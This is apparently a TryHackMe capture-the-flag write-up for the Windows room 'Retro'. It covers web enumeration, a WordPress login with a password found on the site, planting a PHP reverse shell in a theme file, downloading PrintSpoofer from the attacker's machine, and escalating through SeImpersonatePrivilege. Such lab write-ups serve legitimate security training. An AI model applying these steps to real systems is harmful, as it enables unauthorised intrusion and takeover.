TryHackMe : Retro
Intro : This is my new writeup on TryHackMe room Retro. It is a Windows based room. Here you have to hijack a WordPress Account and Get RCE to that Machine. At last U have Escalate UR Privilege with abusing enable SeImpersonate Privilege with PrintSpoofer.exe. So let’s Hack it.
Nmap Scan :
As usual we start with a Basic Nmap Scan. I get 2 Ports are open :
80 (http) and 3389(RDP).
As we have no Credentials to login with RDP Session So I jump back on the website.
Web Enumeration :
On Port 80 I got Microsoft IIS Server is Running.
So I start a GoBuster Scan for Directory Brute-Forcing. I found a valid Directory called ‘retro’.
Tip : gobuster dir -u http://<ip>/ -w <path_of_wordlist> (Seclists)
After that I visit the Web-Site and this is a Wordpress Page.
So I start WpScan to enumerate the web-site and for valid Users on that Site.
Tip : wpscan — url http://<ip>/retro/ -e u
I found ‘wade’ is a Valid User. But I have no password to login. So I again check the website and the Source Code.
Here in the src code of Main Page I found a URL ‘/retro/index.php/author/wade’ and visit that Page. It is the Comment Section.
Below on that page I found a String : parzival. I thought it can wade’s Password.
Tip → wade : parzival
WordPress Exploitation :
I enter this Creds on the Wordpress Login Page and I get Access to Admin Panel. Yupp!
Here in the Theme Editor page (90s Retro) I select the 404.php and change the Content with a Windows PHP Reverse Shell.
You can Find it Here.
Don’t Forget to change IP and Port in the Reverse Shell.
Then I saved It and Set my Netcat Listener. Then I visit that 404.php page.
And Suddenly I get a Reverse Shell in my Listener.
Privilege Escalation :
It’s time for some PrivEsc. I check for all Privileges on that Machine as we don’t have any access to wade User.
Tip : whoami /priv
I found SeImpersonatePrivilege in enable. I found this Post how to abuse this Privilege to get Administrative Access on that Machine.
I made a temp folder and jump into that.
Then I invoke powershell by powershell command.
I download the Git Repo in my Kali Machine.
Then in my Machine I started a Python3 web-server where the PrintSpoofer32.exe file is Present and then use the following command to download the file in Victim’s machine.
Tip : Invoke-WebRequest -Uri http://<tun0_ip>:Port/PrintSpoofer.exe -OutFile PrintSpoofer.exe
You can use help command for any help using that exe File.
Then I run the following Command as Mentioned in Post to access Administrator User.
Tip : .\PrintSpoofer.exe -i -c cmd
And it will prompt us System32 Shell.
In the Users(wade) Desktop you can find User Flag.
In the Users(Administrator) Desktop you can find Root Flag.
Bingo!!!! We completed the room. Here we learn about how to exploit Wordpress Account and how to abuse SeImpersonatePrivilege to get Admin Access.
If you like it don’t Forget to Follow me for more Articles.
THANKS FOR READING!
Happy Hacking~
